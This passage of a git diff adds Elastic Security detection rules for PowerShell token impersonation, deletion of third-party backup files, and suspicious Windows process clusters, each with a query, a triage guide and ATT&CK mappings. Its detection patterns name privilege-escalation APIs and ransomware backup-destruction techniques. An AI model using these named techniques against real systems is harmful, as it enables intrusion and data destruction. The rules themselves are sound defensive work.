LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Regular users should not need to impersonate other users, which makes false positives unlikely. 
In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related Rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"Invoke-TokenManipulation\" or\n \"ImpersonateNamedPipeClient\" or\n \"NtImpersonateThread\" or\n (\n \"STARTUPINFOEX\" and\n \"UpdateProcThreadAttribute\"\n ) or\n (\n \"AdjustTokenPrivileges\" and\n \"SeDebugPrivilege\"\n ) or\n (\n (\"DuplicateToken\" or\n \"DuplicateTokenEx\") and\n (\"SetThreadToken\" or\n \"ImpersonateLoggedOnUser\" or\n \"CreateProcessWithTokenW\" or\n \"CreatePRocessAsUserW\" or\n \"CreateProcessAsUserA\")\n ) \n ) and\n not (\n user.id:(\"S-1-5-18\" or \"S-1-5-19\" or \"S-1-5-20\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\"\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n", + "references": [ + "https://github.com/decoder-it/psgetsystem", + "https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/Get-System.ps1", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": 
"powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "11dd9713-0ec6-4110-9707-32daae1ee68c", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": 
"query", + "version": 11 + }, + "id": "11dd9713-0ec6-4110-9707-32daae1ee68c_11", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_111.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_111.json new file mode 100644 index 00000000000..1044605661d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_111.json 
@@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely.", + "false_positives": [ + "Certain utilities that delete files for disk cleanup or Administrators manually removing backup files." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Third-party Backup Files Deleted via Unexpected Process", + "note": "## Triage and analysis\n\n### Investigating Third-party Backup Files Deleted via Unexpected Process\n\nBackups are a significant obstacle for any ransomware operation. They allow the victim to resume business by performing data recovery, making them a valuable target.\n\nAttackers can delete backups from the host and gain access to backup servers to remove centralized backups for the environment, ensuring that victims have no alternatives to paying the ransom.\n\nThis rule identifies file deletions performed by a process that does not belong to the backup suite and aims to delete Veritas or Veeam backups.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This rule can be triggered by the manual removal of backup files and by removal using other third-party tools that are not from the backup suite. Exceptions can be added for specific accounts and executables, preferably tied together.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Perform data recovery locally or restore the backups from replicated copies (Cloud, other servers, etc.).\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"deletion\" and\n (\n /* Veeam Related Backup Files */\n (\n file.extension : (\"VBK\", \"VIB\", \"VBM\") and\n not (\n process.executable : (\"?:\\\\Windows\\\\*\", \"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\") and\n (process.code_signature.trusted == true and process.code_signature.subject_name : (\"Veeam Software Group GmbH\", \"Veeam Software AG\"))\n )\n ) or\n /* Veritas Backup Exec Related Backup File */\n (\n file.extension : \"BKF\" and\n not process.executable : (\n \"?:\\\\Program Files\\\\Veritas\\\\Backup Exec\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Veritas\\\\Backup Exec\\\\*\"\n )\n )\n ) and\n not (\n process.name : (\"MSExchangeMailboxAssistants.exe\", \"Microsoft.PowerBI.EnterpriseGateway.exe\") and\n (process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) and\n not file.path : (\n \"?:\\\\ProgramData\\\\Trend Micro\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\*\",\n \"?:\\\\$RECYCLE.BIN\\\\*\"\n )\n", + "references": [ + "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + }, + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9_111", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_112.json b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_112.json new file mode 100644 index 00000000000..ac06a1cef65 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/11ea6bec-ebde-4d71-a8e9-784948f8e3e9_112.json 
@@ -0,0 +1,112 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of backup files, saved using third-party software, by a process outside of the backup suite. Adversaries may delete Backup files to ensure that recovery from a ransomware attack is less likely.", + "false_positives": [ + "Certain utilities that delete files for disk cleanup or Administrators manually removing backup files." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Third-party Backup Files Deleted via Unexpected Process", + "note": "## Triage and analysis\n\n### Investigating Third-party Backup Files Deleted via Unexpected Process\n\nBackups are a significant obstacle for any ransomware operation. They allow the victim to resume business by performing data recovery, making them a valuable target.\n\nAttackers can delete backups from the host and gain access to backup servers to remove centralized backups for the environment, ensuring that victims have no alternatives to paying the ransom.\n\nThis rule identifies file deletions performed by a process that does not belong to the backup suite and aims to delete Veritas or Veeam backups.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This rule can be triggered by the manual removal of backup files and by removal using other third-party tools that are not from the backup suite. Exceptions can be added for specific accounts and executables, preferably tied together.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Perform data recovery locally or restore the backups from replicated copies (Cloud, other servers, etc.).\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"deletion\" and\n (\n /* Veeam Related Backup Files */\n (\n file.extension : (\"VBK\", \"VIB\", \"VBM\") and\n not (\n process.executable : (\"?:\\\\Windows\\\\*\", \"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\") and\n (process.code_signature.trusted == true and process.code_signature.subject_name : (\"Veeam Software Group GmbH\", \"Veeam Software AG\"))\n )\n ) or\n /* Veritas Backup Exec Related Backup File */\n (\n file.extension : \"BKF\" and\n not process.executable : (\n \"?:\\\\Program Files\\\\Veritas\\\\Backup Exec\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Veritas\\\\Backup Exec\\\\*\"\n )\n )\n ) and\n not (\n process.name : (\"MSExchangeMailboxAssistants.exe\", \"Microsoft.PowerBI.EnterpriseGateway.exe\") and\n (process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) and\n not file.path : (\n \"?:\\\\ProgramData\\\\Trend Micro\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\*\",\n \"?:\\\\$RECYCLE.BIN\\\\*\"\n )\n", + "references": [ + "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + }, + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9_112", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_3.json b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_3.json new file mode 100644 index 00000000000..071b155e449 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_3.json 
@@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_user", + "name": "Suspicious Windows Process Cluster Spawned by a User", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "1224da6c-0326-4b4f-8454-68cdc5ae542b", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "1224da6c-0326-4b4f-8454-68cdc5ae542b_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_4.json b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_4.json new file mode 100644 index 00000000000..34f360e4b65 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1224da6c-0326-4b4f-8454-68cdc5ae542b_4.json 
@@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_user", + "name": "Suspicious Windows Process Cluster Spawned by a User", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "1224da6c-0326-4b4f-8454-68cdc5ae542b", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. 
Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: if the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "1224da6c-0326-4b4f-8454-68cdc5ae542b_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_107.json b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_107.json new file mode 100644 index 00000000000..8ac4049c187 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/128468bf-cab1-4637-99ea-fdf3780a4609_107.json 
